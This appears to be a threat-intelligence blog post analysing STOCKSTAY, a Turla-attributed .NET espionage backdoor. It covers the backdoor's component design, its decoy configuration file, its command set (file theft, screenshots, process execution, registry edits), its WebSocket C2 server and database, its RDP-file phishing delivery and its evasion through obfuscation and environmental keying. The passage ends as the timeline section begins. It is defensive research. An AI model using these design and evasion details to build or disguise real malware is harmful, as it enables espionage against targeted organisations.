<p><span>Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. The group has a long history of targeting a wide range of industries, with a particular focus on western Ministries of Foreign Affairs, and defense organizations within the context of heightened political tensions. </span></p>
<p><span>Turla, and specifically their longstanding Snake implant, has been publicly </span><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a" rel="noopener" target="_blank"><span>attributed</span></a><span> by the United States Cybersecurity and Infrastructure Security Agency (CISA) to Center 16 of Russia’s Federal Security Service (FSB). Turla is one of the oldest known cyber espionage groups with suspected activity dating back to </span><a href="https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/" rel="noopener" target="_blank"><span>at least 2004</span></a><span>. The actor remains active and continues to evolve its delivery methods, as demonstrated by its </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/"><span>deployment of specialized scripts</span></a><span> to intercept secure communications from Signal Messenger users, its </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/turla-galaxy-opportunity/"><span>hijacking of legacy criminal botnets</span></a><span> to target Ukrainian organizations, and its </span><a href="https://www.microsoft.com/en-us/security/blog/2026/05/14/kazuar-anatomy-of-a-nation-state-botnet/" rel="noopener" target="_blank"><span>recent campaigns</span></a><span> targeting military defense sectors using the highly sophisticated KAZUAR toolkit. As part of our continued tracking of this group, this blog post provides an overview of our STOCKSTAY analysis, includes a timeline of key developmental and operational observations, and examines its similarities to KAZUAR to contextualize this new capability within Turla’s ever-growing arsenal.</span></p>
<h3><span>STOCKSTAY Overview</span></h3>
<p><span>STOCKSTAY is a multi-component backdoor written in .NET, using the Windows Forms framework, which communicates with its command and control (C2) via a secure WebSocket connection, utilizing the open-source </span><a href="https://github.com/sta/websocket-sharp" rel="noopener" target="_blank"><span>websocket-sharp</span></a><span> library. STOCKSTAY consists of several distinct components that communicate with one another via an inter-process communication (IPC) channel, based on the exchange of </span><a href="https://learn.microsoft.com/en-us/windows/win32/dataxchg/wm-copydata" rel="noopener" target="_blank"><span>WM_COPYDATA</span></a><span> messages. </span></p>
<p><span>STOCKSTAY was originally designed to masquerade as a stock market data viewing tool, incorporating this disguise in both its file naming scheme and its storage of implant configuration, control messages, and response data. While initial versions of the malware observed by GTIG retained the internal aspects of this disguise, in 2025 we identified variants of STOCKSTAY masquerading as other benign applications, such as PDF viewers and calculator utilities.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig1.max-1000x1000.png" alt="Overview of STOCKSTAY malware architecture">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="nw27v">Figure 1: Overview of STOCKSTAY malware architecture</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>STOCKSTAY.STOCKBROKER</span></h4>
<p><span>STOCKSTAY.STOCKBROKER is a proxy-aware tunneler which provides network communication capabilities to the wider STOCKSTAY ecosystem. STOCKSTAY.STOCKBROKER, internally referred to as "</span><code>net</code><span>", can be instructed to establish a secure WebSocket connection to a specified remote server, after which it acts as a relay between the server and the STOCKSTAY.STOCKMARKET orchestrator. As a result, all C2 communication between STOCKSTAY and the configured C2 server are handled by STOCKSTAY.STOCKBROKER, isolating the malware’s network communications from other malicious host-based activity on the infected machine. </span></p>
<h4><span>STOCKSTAY.STOCKMARKET</span></h4>
<p><span>STOCKSTAY.STOCKMARKET, internally referred to as “</span><code>cor</code><span>”, is the orchestrator of the STOCKSTAY ecosystem, and enables the implant’s configurability. The malware’s configuration is loaded from an encrypted on-disk configuration file which specifies several options regarding the malware’s execution, including the details of the remote WebSocket server required by STOCKSTAY.STOCKBROKER. The configuration file attempts to disguise itself as a legitimate file by including various legitimate URLs associated with cryptocurrency markets, as well as falsified descriptions of each configuration field (Figure 2). Encrypted configuration data is embedded within the decoy fields, which is decrypted by STOCKSTAY.STOCKMARKET.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
  "Name": "StockMarket",
  "Description": "An application for getting information about current events on trading platforms. To set the time for updating information, enter a value in minutes in the `Interval` field. In the future, support for themes will be added. The `SystemConfiguration` field stores the system settings of the application. In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`.",
  "Theme": "Dark",
  "SystemConfiguration": [
    "1D.AA.79.9F.45.AA.04.B3.&lt;snipped&gt;.68.0A.5D.A3.E6.A3.82.FA",
    "6F.41.4D.6D.C3.20.E5.32.&lt;snipped&gt;.00.B8.26.DF.E1.13.0A.21",
    "4.4.3.12"
  ],
  "Interval": 10,
  "Services": [
    "wss://ws-api.binance.com:443/ws-api/v3",
    "wss://ws-feed.exchange.coinbase.com",
    "wss://ws-feed-public.sandbox.exchange.coinbase.com",
    "wss://stream.bybit.com/v5/public/spot",
    "wss://stream.bybit.com/v5/public/linear"
  ],
  "Version": "2022-12-21"
}</code></pre>
<p><span><span>Figure 2: Encrypted STOCKSTAY configuration file format, falsely describing itself as an application for trading information</span></span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
  "internal_id": "&lt;server_identifier&gt;",
  "internal_key": "&lt;server_public_key&gt;",
  "interval_engine": "600000",
  "level_info": "0",
  "time_scale": "1",
  "span_min": "9",
  "span_max": "18",
  "rate": "2700",
  "rate_control": "false",
  "service": "&lt;websocket_c2_url&gt;",
  "days_not_work": "Saturday;Sunday;",
  "system_properties": "eyJzeXN0ZW1fZGF0YV9zaXplIjoiNDAwMDAwIn0="
}</code></pre>
<p><span><span>Figure 3: Decrypted STOCKSTAY configuration file format (extracted from </span><code>SystemConfiguration</code><span> field)</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>STOCKSTAY.STOCKMARKET communicates with STOCKSTAY.STOCKBROKER in order to provide details of the WebSocket server, and to subsequently send and receive messages via the established WebSocket connection, usually containing the results of executed commands. STOCKSTAY.STOCKMARKET also communicates with the STOCKSTAY.STOCKTRADER component in order to issue commands to be executed on the infected host.</span></p>
<p><span>On first execution, STOCKSTAY.STOCKMARKET generates a unique 4096-bit RSA key pair, to be used throughout the implant’s lifecycle to encrypt outbound data prior to being sent via WebSocket. The implant’s public key is sent to the server in the malware’s first request, to enable the server to decrypt task responses. STOCKSTAY.STOCKMARKET also generates a unique infection identifier to be used by the C2 server to determine the intended receiver of tasking. STOCKSTAY’s configuration file specifies an </span><span>“</span><code>internal_id</code><span>” field, which GTIG assesses represents an identifier for the server-side component of the malware ecosystem. We assess that this identifier is used by the malware’s operators to retrieve responses from interim C2 servers which may be used by multiple operators. To date, GTIG has observed only a single unique value for this identifier and is unable to determine whether multiple operators are leveraging STOCKSTAY at this time due to insufficient telemetry.</span></p>
<h4><span>STOCKSTAY.STOCKTRADER</span></h4>
<p><span>STOCKSTAY.STOCKTRADER, internally referred to as “</span><code>sys</code><span>”, is the backdoor component of the STOCKSTAY ecosystem, and supports a range of registry, file, and command execution operations on the infected host, as detailed in Table 1.</span></p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><span>Task Command Name</span></p>
</th>
<th scope="col">
<p><span>Description</span></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>Del</code></p>
</td>
<td>
<p><span>Delete the specified files.</span></p>
<p><span>Requires a semi-colon-separated list of file paths, each of which will be deleted. Confirmation of each deleted file, or deletion failure, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Dir</code></p>
</td>
<td>
<p><span>Generate a listing of the specified directories.</span></p>
<p><span>Requires a semi-colon-separated list of directory paths, each of which will be enumerated with the paths of all contained files and subdirectories being returned to the C2.</span></p>
<p><span>Optionally performs recursive directory listing.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Get</code></p>
</td>
<td>
<p><span>Retrieve one or more specified files. Allows for collection of files with specific extensions.</span></p>
<p><span>Requires a semi-colon-separated list of file or directory paths, and a list of target file extensions. If a file path is included in the list, this file will be returned. If instead a directory path is included in the list, the malware will perform an optionally recursive search of the directory to identify any files matching the target file extensions. </span></p>
<p><span>All files matching either the specified file paths, or the target file extensions, will be added to an in-memory ZIP archive and subsequently base64-encoded for transmission to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Image</code></p>
</td>
<td>
<p><span>Perform a screen-capture of the victim’s screen.</span></p>
<p><span>The resultant image is base64-encoded for transmission to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>MkDir</code></p>
</td>
<td>
<p><span>Create one or more directories.</span></p>
<p><span>Requires a semi-colon-separated list of directory paths, each of which will be created. Confirmation of each created directory, or any resultant error, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>MultyTask</code></p>
</td>
<td>
<p><span>Process multiple tasks at once.</span></p>
<p><span>Requires a semi-colon-separated list of tasks, each of which must be a serialized JSON object containing an individual task.</span></p>
<p><span>Each task is submitted to the malware’s command-manager in-turn, with all command output being discarded; no data is returned to the C2 when processing multiple tasks at once.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Put</code></p>
</td>
<td>
<p><span>Upload a file to the device.</span></p>
<p><span>Requires a base64-encoded string representation of the file content to be written to the specified filepath. The required file write operation is performed in “Append” mode.</span></p>
<p><span>Confirmation of file upload, or details of any relevant error, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>RegDelete</code></p>
</td>
<td>
<p><span>Delete a registry value.</span></p>
<p><span>Requires a registry key and corresponding value name to delete.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>RegRead</code></p>
</td>
<td>
<p><span>Read a registry value.</span></p>
<p><span>Requires a registry key and corresponding value name to read.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>RegWrite</code></p>
</td>
<td>
<p><span>Set a registry value. </span></p>
<p><span>Requires a registry key and corresponding value name, as well as the value and data type used to populate the registry value. </span></p>
</td>
</tr>
<tr>
<td>
<p><code>RmDir</code></p>
</td>
<td>
<p><span>Delete the specified directories.</span></p>
<p><span>Requires a semi-colon-separated list of directory paths, each of which will be deleted. Confirmation of each deleted directory, or deletion failure, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Run</code></p>
</td>
<td>
<p><span>Execute a new process.</span></p>
<p><span>Requires a path to the file to execute and its corresponding arguments. A default timeout of 60 seconds is hard-coded into the malware, however this can be overridden by the task configuration.</span></p>
<p><span>All subprocesses are created windowless with redirected stdout.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Sysinfo</code></p>
</td>
<td>
<p><span>Conduct a system survey to gather key information about the infected host.</span></p>
<p><span>Operating system information is collected via the Windows Management Instrumentation (WMI) ManagementObjectSearcher, specifically the following fields:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>OSVersion</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Architecture</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>SerialNumber</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>CodeSet</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>CountryCode</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Locale</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>InstallDate</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>BootupTime</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MachineName</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>SystemDirectory</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>LocalTime</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>AnsiCodePage</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>UserName</span></p>
</li>
</ul>
<p><span>With respect to hardware, WMI is queried for the following:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>ProcessorName</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>NumberCores</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>ClockSpeed</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MemoryCapacity</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MemoryType</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DiskModel </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DiskSize</span></p>
</li>
</ul>
<p><span>The malware also captures a list of the names of running processes.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>UnpackArchive</code></p>
</td>
<td>
<p><span>Extract the specified ZIP file to its current directory.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 1: Backdoor commands supported by STOCKSTAY.STOCKTRADER</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Related Downloaders and Installers</span></h4>
<h5><span>STOCKSTAY.MARKETMAKER</span></h5>
<p><span>STOCKSTAY.MARKETMAKER is a proxy-aware downloader written in .NET using the Windows Forms framework that downloads and extracts additional payloads from a remote server, establishes persistence through Windows registry modifications, and runs silently in the background with no user interface. This downloader has been observed masquerading as "MicrosoftUpdateOneDrive" to appear legitimate while setting up multiple autorun entries to execute the core components of STOCKSTAY.</span></p>
<h5><span>.NET AppDomainManager</span></h5>
<p><span>During our analysis, GTIG identified what we believe to be an early development sample of STOCKSTAY.MARKETMAKER which, instead of downloading the required components, was dependent on external mechanisms (such as </span><a href="https://attack.mitre.org/techniques/T1574/014/" rel="noopener" target="_blank"><span>.NET AppDomainManager injection</span></a><span>) for the initial deployment of samples to the target host.</span></p>
<h4><span>STOCKSTAY Server-Side Controller</span></h4>
<p><span>GTIG identified a publicly accessible GitHub repository containing a Python implementation of the victim-facing STOCKSTAY WebSocket server controller. The lightweight design of the server component appears to supplement the threat actor’s usage of third-party hosting platforms such as </span><a href="https://render.com/" rel="noopener" target="_blank"><span>Render</span></a><span> platform which provides a platform for hosting web services, including </span><a href="https://render.com/docs/websocket" rel="noopener" target="_blank"><span>WebSockets</span></a><span>. The inability for the server to decrypt inbound messages prevents introspection by platform operators, and further obfuscates the location of the threat actor’s dedicated infrastructure. This architecture somewhat resembles Turla’s multi-hop KAZUAR C2 infrastructure.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig4.max-1000x1000.png" alt="Overview of STOCKSTAY C2 Infrastructure">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="s9mt0">Figure 4: Overview of STOCKSTAY C2 Infrastructure</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The server extends </span><code>tornado.websocket.WebSocketHandler</code><span> to provide the interface described in Table 2, under the path </span><code>/ws</code><span>; aligning with all observed STOCKSTAY WebSocket C2 URLs.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>Event</span></strong></p>
</td>
<td>
<p><strong><span>Description</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.check_origin" rel="noopener" target="_blank"><span>WebSocketHandler.check_origin</span></a></p>
</td>
<td>
<p><span>Hard-coded to return True to </span><span>accept all cross-origin traffic.</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.open" rel="noopener" target="_blank"><span>WebSocketHandler.open</span></a></p>
</td>
<td>
<p><span>Logs the client’s IP address using the following string format:</span></p>
<p><code>WebSocket open. IP: {client_ip}</code></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_message" rel="noopener" target="_blank"><span>WebSocketHandler.on_message</span></a></p>
</td>
<td>
<p><span>Handles inbound messages from the connected client.</span></p>
<p><span>Inbound messages are base64-decoded before being parsed as JSON into an object internally known as a “package”.</span></p>
<p><span>Each “package” contains an “action” and a “container”, which provide the request’s type and associated data, respectively. The following describes the handling logic of each action type.</span></p>
<p><strong>Action: </strong><strong>send</strong></p>
<p><span>The server extracts the following attributes from the inbound message’s “container” and inserts them into a new row within the local </span><code>weather_data</code><span> database table.</span></p>
<p><code>container.target</code></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The STOCKSTAY client populates this field with the </span><code>internal_id</code><span> or </span><code>i_id</code><span> field from the config file.</span></p>
</li>
</ul>
<p><code>container.sender</code></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The STOCKSTAY client populates this field with the unique client uuid generated on first execution.</span></p>
</li>
</ul>
<p><code>container.message</code></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>This field contains the encrypted message body in a format referred to within the STOCKSTAY client as “CryptoContainer”. </span></p>
</li>
</ul>
<p><span>On completion, the server logs the following message:</span></p>
<p><code>Action: send; trgt={target_id}; sndr={sender_id}</code></p>
<p><strong>Action: </strong><strong>recv</strong></p>
<p><span>Inbound </span><code>recv</code><span> requests simply specify the </span><code>container.sender</code><span> attribute, which corresponds with the client’s unique identifier.</span></p>
<p><span>The server then retrieves all messages from the </span><code>weather_data</code><span> database table where the target identifier (“degrees” column) matches the specified </span><code>container.sender</code><span>. This has the effect of allowing the client to retrieve all messages intended for it, such as those sent to the server by an upstream C2 controller.</span></p>
<p><span>Each matching row is returned to the client in the following format, before being deleted from the database.<br><br></span></p>
<pre class="language-plain"><code>{
	"target": degrees,
	"sender": pressure,
	"message": wdata,
	"ip": coords,
	"time": datetime
}</code></pre>
<p><span>On completion, the server logs the following message:</span></p>
<p><code>Action: recv; sndr={sender}</code></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_close" rel="noopener" target="_blank"><span>WebSocketHandler.on_close</span></a></p>
</td>
<td>
<p><span>Logs the client’s IP address using the following string format:</span></p>
<p><code>WebSocket close. IP: {client_ip}</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 2: Overview of STOCKSTAY WebSocket Server Interface</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Database Structure</span></h4>
<p><span>The server maintains a local SQLite3 database under the filename </span><code>weather_data1.db</code><span>, structured as shown in Tables 3 and 4.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Column</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>id</code></p>
</td>
<td>
<p><span>Primary key</span></p>
</td>
</tr>
<tr>
<td>
<p><code>degrees</code></p>
</td>
<td>
<p><span>Recipient's UUID from </span><code>container.target</code></p>
</td>
</tr>
<tr>
<td>
<p><code>pressure</code></p>
</td>
<td>
<p><span>Sender's UUID from </span><code>container.sender</code></p>
</td>
</tr>
<tr>
<td>
<p><code>wdata</code></p>
</td>
<td>
<p><span>Message data from </span><code>container.message</code></p>
</td>
</tr>
<tr>
<td>
<p><code>coords</code></p>
</td>
<td>
<p><span>Sender's IP address, extracted from </span><code>X-Forwarded-For</code><span> header, or </span><code>none_ip</code><span> if no sender specified.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>status</code></p>
</td>
<td>
<p><span>Defaults to 0 - doesn't appear to be used or returned to the client.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>datetime</code></p>
</td>
<td>
<p><span>Time of row creation</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 3: </span><code>weather_data</code><span> database table structure</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Column</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>id</code></p>
</td>
<td>
<p><span>Primary key</span></p>
</td>
</tr>
<tr>
<td>
<p><code>data</code></p>
</td>
<td>
<p><span>Log message</span></p>
</td>
</tr>
<tr>
<td>
<p><code>datetime</code></p>
</td>
<td>
<p><span>Time of creation</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 4: </span><code>log</code><span> database table structure</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Key Operational Characteristics</span></h3>
<h4><span>Consistent Use of Academic or Diplomatic Lure Content</span></h4>
<p><span>The threat actor(s) involved in STOCKSTAY operations appear to have an affinity for integrating academia and diplomacy into their infrastructure and lure/decoy content, including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>compromising an email account belonging to a Ukrainian university to disseminate phishing emails;</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>using the names of an academic institution within the file name of a malicious RDP file;</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>compromising a diplomatic education platform for phishing and distribution of malicious RDP files;</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>using “education” and “diplo” within registered phishing domains; and</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>using “DiplomacyEduAI” as the product name within STOCKSTAY MSI files.</span></p>
</li>
</ul>
<h4><span>Persistent Ukrainian Targeting</span></h4>
<p><span>A significant proportion of STOCKSTAY operations observed by GTIG have been targeted at Government or Military organizations within Ukraine, consistent with Russian interests in relation to the ongoing conflict between the two countries. The threat actor has been observed utilizing in-country compromised infrastructure, including compromised government services, to deploy both STOCKSTAY and a range of supplementary payloads, in support of these operations. </span></p>
<h4><span>Suspected European Targeting</span></h4>
<p><span>A smaller number of STOCKSTAY operations observed by GTIG appear to have been targeted at European entities. Early development samples of STOCKSTAY were identified in various European nations, including Italy, the Netherlands, Poland, and Germany; however, we have been largely unable to confirm the intended victims for the majority of these early infections, nor whether these samples were identified as a result of the threat actor testing their capabilities against publicly available virus scanning services such as VirusTotal. GTIG was able to identify, in at least one case, the targeting of entities associated with, or interested in, a foreign affairs ministry in Europe in relation to phishing and suspected STOCKSTAY activity. </span></p>
<h4><span>Deployment via Malicious RDP Files</span></h4>
<p><span>GTIG observed STOCKSTAY being deployed following successful phishing attempts using malicious RDP configuration files. The RDP files were designed to create a connection from the victim’s device to actor-controlled infrastructure, through which the actor could then deploy subsequent payloads.</span></p>
<p><span>In one operation in early 2025, GTIG identified a phishing email, claiming to be sent by a defense-related training academy, containing a malicious RDP file attachment. A short time following the victim’s connection to the actor’s infrastructure, the actor deployed STOCKSTAY.MARKETMAKER, a .NET downloader designed to retrieve and install the full STOCKSTAY suite on the victim’s device. </span></p>
<p><span>Later, in mid-2025, GTIG identified similar malicious RDP files being hosted on a compromised diplomatic-themed education platform, luring victims into downloading and executing the file under the guise of enabling access to an online training portal. GTIG was unable to confirm whether STOCKSTAY was ultimately deployed as a result of this operation; however, overlaps in the actor’s infrastructure and education-themed lures for both operations may suggest STOCKSTAY was the intended payload. </span></p>
<h4><span>Deployments at Multiple Stages of Operations</span></h4>
<p><span>Through GTIG’s visibility, we have identified that the threat actor uses STOCKSTAY at multiple distinct stages of their operations. </span></p>
<p><span>In the first instance, the threat actor uses STOCKSTAY during operations to gain initial access into environments which haven’t yet been subject to the group’s reconnaissance activities. In these instances, STOCKSTAY is configured with hard-coded configuration passwords, which can be trivially extracted by analysts. We observed this type of infection stemming from the group’s phishing operations, where the threat actor is unable to determine exactly where in the victim’s network they are going to gain their initial foothold.</span></p>
<p><span>When the threat actor deploys STOCKSTAY at a later stage of operation, following reconnaissance, STOCKSTAY is configured to incorporate environmental keying for its configuration, requiring the malware to be executed either on a specific host, by a specific user, within a specific domain, or a pre-determined combination of the these attributes. This configuration implies that, at this stage, the actor knows exactly which machine is being targeted, likely through existing accesses to the target environment. This was seen within Ukrainian networks where STOCKSTAY was deployed toward the end of an operation which had previously relied heavily on the group’s other tools, such as KAZUAR. </span></p>
<h3><span>Overlaps with KAZUAR</span></h3>
<h4><span>K1MORPHER String Obfuscation</span></h4>
<p><span>In April 2025, GTIG observed STOCKSTAY being updated to implement a new string obfuscation mechanism, based around an obscure pseudo-random number generation algorithm named “Squirrel3”, which was </span><a href="https://www.gdcvault.com/play/1024365/Math-for-Game-Programmers-Noise" rel="noopener" target="_blank"><span>presented</span></a><span> at Game Developers Conference 2017. </span></p>
<p><span>GTIG later identified versions of STOCKSTAY containing some of their original class-names, which showed the code responsible for runtime string deobfuscation being contained within a class named “K1.Morpher”. Analysis of K1MORPHER shows the ability to perform runtime deobfuscation of a range of datatypes, such as strings, integers, and arrays. </span></p>
<p><span>In June 2025 GTIG noticed K1MORPHER code appearing in samples of KAZUAR. KAZUAR has historically used its own simple but effective code and string obfuscation techniques to evade detection, such as: the insertion of junk code; replacing static constant values with the results of XOR operations; and large quantities of unique character substitution tables. The actor’s use of K1MORPHER within STOCKSTAY appears to be trending toward mimicking KAZUAR’s multi-class obfuscation techniques, where obfuscation is handled by multiple distinct classes, as observed in suspected test builds of STOCKSTAY hosted on a compromised Cypriot website in April 2024.</span></p>
<h4><span>Implant Architecture</span><span> </span></h4>
<p><span>Since at least 2024, KAZUAR has been observed being deployed using a multi-component architecture, whereby C2 communication, task orchestration, and task execution are managed by separate components. Within the KAZUAR ecosystem, these components are referred to as “BRIDGE”, “KERNEL”, and “WORKER”, respectively.</span></p>
<p><span>As of late 2023, GTIG identified a similar separation of responsibilities within the STOCKSTAY ecosystem, with the same responsibilities being separated into distinct components. C2 communication is managed by the component tracked by GTIG as STOCKSTAY.STOCKBROKER, while task orchestration and execution are handled by STOCKSTAY.STOCKMARKET and STOCKSTAY.STOCKTRADER, respectively.</span></p>
<h4><span>Environmental Keying</span></h4>
<p><span>Both KAZUAR and STOCKSTAY ecosystems have been observed using environmental keying to protect themselves from detection and analysis.</span></p>
<p><span>DIAMONDBACK, a dropper often deployed prior to KAZUAR in the execution chain, has made use of a hash of the target’s hostname in decrypting its payload, to prevent divulgence of its intentions outside of the target environment. Later versions of DIAMONDBACK can be configured to incorporate the target’s username and domain name in the hash required to decrypt the payload.</span></p>
<p><span>STOCKSTAY has been observed using the hash of the target’s hostname or domain name during the decryption of its configuration data, preventing disclosure of C2 infrastructure unless operating in the intended environment.</span></p>
<h4><span>Summary of Overlaps</span></h4>
<p><span>GTIG assesses with moderate confidence that STOCKSTAY and KAZUAR may be developed in-part by a common developer or team, with active development occurring in tandem between the two malware ecosystems. We believe that STOCKSTAY is being developed in KAZUAR’s image, with several design decisions likely spawning from the threat actor’s wealth of experience in conducting operations using this long-standing toolkit. Both ecosystems rely heavily on .NET development, and have been observed using compromised WordPress sites during various stages of their operations.</span></p>
<p><span>We assess with low confidence that our observations of STOCKSTAY being deployed alongside KAZUAR during active operations may be a result of the threat actor seeking to test new capabilities in active operations, particularly where they may be expecting their existing access to be remediated in the near future. </span></p>
<h3><span>STOCKSTAY Timeline</span></h3>
<p><span>GTIG has conducted a thorough investigation into the history of STOCKSTAY, identifying suspected development activity as far back as December 2022. What follows is our assessment of the timeline of events surrounding STOCKSTAY’s development and deployment. To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) within each observed operation section, and in a </span><a href="https://www.virustotal.com/gui/collection/ed88a43801b5c58b9be27fa74abaa278a48904f3cc1bc905f2d85e32448b96c5/iocs" rel="noopener" target="_blank"><span>GTI Collection</span></a><span> for registered users.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
